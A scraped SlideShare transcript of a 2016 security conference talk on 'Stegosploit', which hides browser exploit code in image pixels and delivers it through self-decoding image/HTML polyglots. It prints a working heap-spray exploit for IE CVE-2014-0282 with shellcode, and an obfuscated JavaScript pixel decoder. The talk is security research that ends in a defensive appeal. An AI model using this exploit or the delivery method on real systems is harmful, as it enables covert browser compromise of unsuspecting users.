SlideShare une entreprise Scribd logo

Stegosploit - NCSC ONE 2016

Saumil Shah
Saumil Shah

My presentation on "Stegosploit" - exploits delivered via steganography and polyglots at NCSC ONE 2016, Den Haag, Netherlands.

Internet
1  sur  44
NETSQUARE PAINTING AN EXPLOIT IN AN IMAGE SAUMIL SHAH NCSC ONE 2016 STEGOSPLOIT
NETSQUARE @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999. Saumil Shah CEO, Net-Square NETSQUARE
NETSQUARE A good exploit is one that is delivered in style
NETSQUARE Agenda •  Stegosploit design goals •  Stegosploit-ing an exploit •  Steganography techniques •  The decoder •  Polyglot Images •  Conclusions
NETSQUARENETSQUARE Stegosploit Design Goals •  Only VALID images on network and disk. •  Exploit code hidden in pixels. •  Self contained decoder code. •  Exploit automatically decoded and triggered upon loading... •  ...all with just ONE IMAGE, •  in STYLE!
NETSQUARE Steganography NETSQUARE
NETSQUARE Polyglots Two or more data formats in a single container... ...that co-exist happily without breaking each other's spec or syntax.
NETSQUARE Stegosploit-ing a browser exploit IMAJS STEGO- DECODER JAVASCRIPT TARGET BROWSER POLYGLOT PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE Case study: CVE-2014-0282 -  IE CInput Use-After-Free -  hidden in a JPG Case study: CVE-2013-1690 -  FF onreadystatechange UAF -  hidden in a PNG
NETSQUARE Step 1. Hiding the Exploit Code in the Image PIXEL ENCODER EXPLOIT CODE IMAGE ENCODED IMAGE
NETSQUARE Hiding an Exploit in an Image . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . "SAUMIL" = 01010011 01000001 01010101 01001101 01001001 01001100
NETSQUARE ganesha.jpg Hiding an Exploit in an Image function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b ++){if(b>=8192){b=0}a.data[c]=(b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b +='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
NETSQUARE 1 pixel = 8 bits (grayscale) The "Bit Layer" View 7  6 5 4 3 2 1 0 | | MSB LSB
NETSQUARE more shape less detail 7 6 5 4 3 2 1 0 less shape more detail The "Bit Layer" View
NETSQUARE
NETSQUARE 7 6 5 4 3 2 1 0
NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 7 are overwritten with exploit bitstream. Encoding at Bit Layer 7 7 6 5 4 3 2 1 0 | | MSB LSB
Encoding data at bit layer 7 Significant visual aberration
NETSQUARE Exploit code converted to bitstream. Pixel bits of layer 2 are overwritten with exploit bitstream. Encoding at Bit Layer 2 7 6 5 4 3 2 1 0 | | MSB LSB
Encoding data at bit layer 2 No perceptible visual aberration
NETSQUARE Encoding on JPG vs PNG •  JPG = lossy compression •  Pixels approximated to nearest neighbours •  Multi-pass encoding •  Min. layer = 2 or 3 •  Browser specific JPEG encoders •  PNG = lossless compression •  Negligible visual distortion in the image •  Single pass encoding •  Min. layer = 0 •  Independent of browser's PNG encoder
NETSQUARE Step 2. Decoding the encoded Pixel Data ? STEGO- DECODER JAVASCRIPT ENCODED IMAGE
NETSQUARE HTML5 CANVAS to the rescue! •  In-browser decoding of steganographically encoded images. •  Read image pixel data using JS. •  Rebuild JS exploit code from pixel data, in memory. •  Simple array and bit manipulation operations.
NETSQUARE decode_pixels.js L=2,C=3,G=3,a=[],x=y=0,z=1<<L,I=parseInt,S=String.fromCharCode;window.onload= function(){P.onclick=function({V=document.createElement("canvas");k=P.parentNode; k.insertBefore(V,P);W=V.width=P.width;H=V.height=P.height;m=V.getContext("2d"); m.drawImage(P,0,0);k.removeChild(P);m=m.getImageData(0,0,W,H).data;c=function(p,x,y) {n=(y*W+x)*4;r=(p[n]&z)>>L;g=(p[n+1]&z)>>L;b=(p[n+2]&z)>>L;return S([r,g,b,r][C]+48)}; k=function(l){for(i=j=0;j<l*8;j++){a[i++]=c(m,x,y);x+=G;if(x>=W){x=0;y+=G}}};k(6); k(I(X(a)));try{CollectGarbage()}catch(e){}setTimeout(new Function(X(a)),99)}};function X(c){s="",d=c.join(s);for(i=0;i<d.length;i+=8)s+=S(I(d.substr(i,8),2));return s} $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$) +"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""+$.__$+$.__$+$.$__+"="+$._$_+","+$.__$+$.___+$._$$+"="+$._$$+","+ $.__$+$.___+$.$$$+"="+$._$$+","+$.$_$_+"=[],"+$.__$+$.$$$+$.___+"="+$.__$+$.$$$+$.__$+"="+$.___+","+$.__$+$.$$$+$._$_+"="+$.__$+"<<"+$.__$+$.__$+$.$__+","+$.__$+$.__$+$.__$+"="+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+ $.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$$_+$.__+","+$.__$+$._$_+$._$$+"="+$.__$+$._$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+"."+$.$$$$+""+$.__$+ $.$$_+$._$_+$._$+""+$.__$+$.$_$+$.$_$+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.__$+$.___+$._$$+$._$+$.$$_$+$.$$$_+";"+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$_$+$._$+" "+$.__$+$.$$_+$.$$$+"."+$._$+""+$.__$+$.$_$+$.$$_+(![]+"")[$._$_]+$._$+$.$_$_+$.$$_$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.___+"."+$._$+""+$.__$+$.$_$+$.$$_ +$.$$__+(![]+"")[$._$_]+""+$.__$+$.$_$+$.__$+$.$$__+""+$.__$+$.$_$+$._$$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.$$_+"="+$.$$_$+$._$+$.$$__+$._+""+$.__$+$. $_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+""+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+""+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"(""+$.$$__+$.$_$_+""+$.__$+$. $_$+$.$$_+""+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$$+"");"+$.__$+$.$_$+$._$$+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+""+$.__$+$.__$+$.$$_+$._$+$.$$_$+$.$$ $_+";"+$.__$+$.$_$+$._$$+"."+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+""+$.__$+$.___+$._$_+$.$$$_+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+$.$$$_+"("+$.__$+$._$_+$.$$_+","+$.__$+$._ $_+$.___+");"+$.__$+$._$_+$.$$$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+$.___+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+ $.___+";"+$.__$+$.__$+$.___+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+"="+$.__$+$._$_+$.___+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+ $.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+";"+$.__$+$.$_$+$.$_$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.$$_+$.__+$.$$$_+""+$.__$+$.$$$+$.___+$.__+"(""+$._$_+$.$$_$+" ");"+$.__$+$.$_$+$.$_$+"."+$.$$_$+""+$.__$+$.$$_+$._$_+$.$_$_+""+$.__$+$.$$_+$.$$$+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"("+$.__$+$._$_+$.___+","+$.___+","+$.___+");"+$.__$+$.$_$+$._$$+"."+ $.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$_$+$._$+""+$.__$+$.$$_+$.$$_+$.$$$_+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.__$+$._$_+$.___+");"+$.__$+$.$_$+$.$_$+"="+$.__$+$.$_$+$.$_ $+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+""+$.__$+$.___+$.$__+$.$_$_+$.__+$.$_$_+"("+$.___+","+$.___+","+$.__$+$._$_+$.$$$+","+$.__$+$.__$+$.___+")."+$.$$_$+ $.$_$_+$.__+$.$_$_+";"+$.$$__+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$.___+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+"){"+$.__$+$.$_$+$.$$_+"=("+$.__$+$.$$ $+$.__$+"*"+$.__$+$._$_+$.$$$+"+"+$.__$+$.$$$+$.___+")*"+$.$__+";"+$.__$+$.$$_+$._$_+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$__+$.$$$+"=("+$.__$+$.$$_+$.___+"["+ $.__$+$.$_$+$.$$_+"+"+$.__$+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.$_$$+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"+"+$._$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$$_+$._$_+$.$$$_+$.__+$._+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$_+$._$$+"(["+$.__$+$.$$_+$._$_+","+$.__$+$.$__+$.$$$+","+$.$_$$+","+$.__$+$.$$_+$._$_+"]["+$.__$+$.___+$._$$+"]+"+$.$__+$.$___+")};"+$.__$+$.$_$+$._$$+"="+$.$$$$+ $._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+(![]+"")[$._$_]+"){"+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.__$+$.$_$+$._$_+"="+$.___+";"+$.__$+$.$_$+$._$_+"<"+(![]+"")[$._$_] +"*"+$.$___+";"+$.__$+$.$_$+$._$_+"++){"+$.$_$_+"["+$.__$+$.$_$+$.__$+"++]="+$.$$__+"("+$.__$+$.$_$+$.$_$+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+");"+$.__$+$.$$$+$.___+"+="+$.__$+$.___+$.$$$+";"+$.__$+$.$_$+$.__$+$.$$$$+"("+ $.__$+$._$_+$.$$$+"<"+$.__$+$.$$$+$.___+"){"+$.__$+$.$$$+$.___+"="+$.___+";"+$.__$+$.$$$+$.__$+"+="+$.__$+$.___+$.$$$+"}}};"+$.__$+$.$_$+$._$$+"("+$.$$_+");"+$.__$+$.$_$+$._$$+"("+$.__$+$.__$+$.__$+"("+$.__$+$._$$+$.___+"("+$.$_$_ +")));"+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$$$+$.__$+"{"+$.__$+$.___+$._$$+$._$+(![]+"")[$._$_]+(![]+"")[$._$_]+$.$$$_+$.$$__+$.__+""+$.__$+$.___+$.$$$+$.$_$_+""+$.__$+$.$$_+$._$_+$.$_$$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"()}"+$.$$__+ $.$_$_+$.__+$.$$__+""+$.__$+$.$_$+$.___+"("+$.$$$_+"){}"+$.__$+$.$$_+$._$$+$.$$$_+$.__+""+$.__$+$._$_+$.$__+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$_$+$.$$$_+$._$+$._+$.__+"("+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.$$$+""+$. $__+$.___+""+$.__$+$.___+$.$$_+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$._$$+$.___+"("+$.$_$_+")),"+$.$__$+$.$__$+")}};"+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$. $_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$$+$.___+"("+$.$$__+"){"+$.__$+$.$$_+$._$$+"="","+$.$$_$+"="+$.$$__+"."+$.__$+$.$_$+$._$_+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$._$$+");"+ $.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.___+";"+$.__$+$.$_$+$.__$+"<"+$.$$_$+"."+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+$.__+""+$.__$+$.$_$+$.___+";"+$.__$+$.$_$+$.__$+"+="+$.$___+")"+ $.__$+$.$$_+$._$$+"+="+$.__$+$._$_+$._$$+"("+$.__$+$.__$+$.__$+"("+$.$$_$+"."+$.__$+$.$$_+$._$$+$._+$.$_$$+""+$.__$+$.$$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+","+$.$___+"),"+$._$_+"));"+$.__$+$.$$_+$._$_+$.$$$_+ $.__+$._+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$.$$_+$._$$+"}"+""")())();
NETSQUARE Step 3. Images that ``Auto Run`` IMAJS STEGO- DECODER JAVASCRIPT POLYGLOT ENCODED IMAGE
NETSQUARE IMAJS I SEE PIXELS I SEE CODE
NETSQUARE IMAJS - Image+JS Polyglot Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
NETSQUARE I JPG IMAJS-JPG! JPG +HTML +JS +CSS
NETSQUARE IMAJS-JPG Recipe
NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres DQT SOF0 DHT FF E0 U Yres H V FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres FF E0 U Yres H V ... more random data ... <html random random random random... and other HTML stuff goes here... random ><head random> decoder script <script type=text/undefined> ... DQT SOF0 DHT FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Huffman tables
NETSQUARE IMAJS-PNG Recipe Inspiration: http://daeken.com/superpacking-js-demos PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength _00<html random random ... CRC random><head random> decoder script and other HTML stuff goes here... <script type=text/undefined>... extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk
NETSQUARE Step 4. The Finer Points of Package Delivery
NETSQUARE Content Sniffing Credits: Michael Zalewski @lcamtuf
NETSQUARE Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ DEC 2015 APR 2016 < PAYLOADS GO back in time
NETSQUARE Good to Go
NETSQUARE Conclusions
NETSQUARE 2010: Theory, 2014: Practice
NETSQUARE Today's attacks succeed because the defense is REACTIVE
NETSQUARE Today's Infosec Defence? Rules Signatures Updates Machine Learning
NETSQUARE Browsers and W3C - Wake Up! BROWSERS •  Don't be afraid to "BREAK THE WEB". •  Reject content that does not conform to strict standards/specs. W3C •  STRICT parsing rules – like COMPILERS. •  Browser compliance and user- awareness is YOUR responsibility.
NETSQUARE HTML rendering should be...
NETSQUARE ...a "zero tolerance" process.
NETSQUARE Tools http://stegosploit.info Paper PoC||GTFO 0x08
NETSQUARE THE END Saumil Shah @therealsaumil saumilshah saumil@net-square.com Photography: flickr.com/saumil www.spectral-lines.in

Recommandé

Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015Saumil Shah
 
Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Saumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good PackagesSaumil Shah
 
Pixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup SalzburgPixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup Salzburgwolframkriesing
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Patrick Chanezon
 
Crush Candy with DukeScript
Crush Candy with DukeScriptCrush Candy with DukeScript
Crush Candy with DukeScriptAnton Epple
 
Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Raphael Marques
 

Recommandé

Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015Stegosploit - Blackhat Europe 2015
Stegosploit - Blackhat Europe 2015Saumil Shah
 
Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Saumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Saumil Shah
 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good PackagesSaumil Shah
 
Pixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup SalzburgPixelplant - WebDev Meetup Salzburg
Pixelplant - WebDev Meetup Salzburgwolframkriesing
 
Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Google's HTML5 Work: what's next?
Google's HTML5 Work: what's next?Patrick Chanezon
 
Crush Candy with DukeScript
Crush Candy with DukeScriptCrush Candy with DukeScript
Crush Candy with DukeScriptAnton Epple
 
Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Mini-curso JavaFX Aula2
Mini-curso JavaFX Aula2Raphael Marques
 
JavaFX
JavaFXJavaFX
JavaFXRaphael Marques
 
Ssaw08 0624
Ssaw08 0624Ssaw08 0624
Ssaw08 0624Atsushi Tadokoro
 
Lambda expressions in C++
Lambda expressions in C++Lambda expressions in C++
Lambda expressions in C++Dimitrios Platis
 
The history of Flash
The history of FlashThe history of Flash
The history of FlashMaso Lin
 
ARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysGilbert Guerrero
 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBRaphael Marques
 
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Dimitrios Platis
 
Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Raphael Marques
 
The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016Saumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober20152016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015Saumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CanSecWest
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSSaumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingSaumil Shah
 
Intro to computer vision in .net
Intro to computer vision in .netIntro to computer vision in .net
Intro to computer vision in .netStephen Lorello
 
Intro to HTML5
Intro to HTML5Intro to HTML5
Intro to HTML5Jussi Pohjolainen
 
Building Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhBuilding Native Apps- A Digital Canvas for Coders and Designers with Walter Luh
Building Native Apps- A Digital Canvas for Coders and Designers with Walter LuhFITC
 
I Can't Believe It's Not Flash
I Can't Believe It's Not FlashI Can't Believe It's Not Flash
I Can't Believe It's Not FlashThomas Fuchs
 

Contenu connexe

Tendances

The history of Flash
The history of FlashThe history of Flash
The history of FlashMaso Lin
 
ARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysGilbert Guerrero
 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBRaphael Marques
 
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Dimitrios Platis
 

Tendances (8)

JavaFX
JavaFXJavaFX
JavaFX
 
Ssaw08 0624
Ssaw08 0624Ssaw08 0624
Ssaw08 0624
 
Lambda expressions in C++
Lambda expressions in C++Lambda expressions in C++
Lambda expressions in C++
 
The history of Flash
The history of FlashThe history of Flash
The history of Flash
 
ARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + ArraysARTDM 170, Week 13: Text Elements + Arrays
ARTDM 170, Week 13: Text Elements + Arrays
 
Mini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPBMini-curso JavaFX Aula3 UFPB
Mini-curso JavaFX Aula3 UFPB
 
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]Writing SOLID C++ [gbgcpp meetup @ Zenseact]
Writing SOLID C++ [gbgcpp meetup @ Zenseact]
 
Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1Mini-curso JavaFX Aula1
Mini-curso JavaFX Aula1
 

En vedette

The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016The Infosec Crossroads - 44CON 2016
The Infosec Crossroads - 44CON 2016Saumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsSaumil Shah
 
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober20152016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015
2016: The Infosec Crossroads - Keynote at Intuit #Hacktober2015Saumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to DebuggersSaumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions WorkSaumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A PrimerSaumil Shah
 
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CSW2017 Saumil shah stegosploit_internals_cansecwest_2017
CSW2017 Saumil shah stegosploit_internals_cansecwest_2017CanSecWest
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
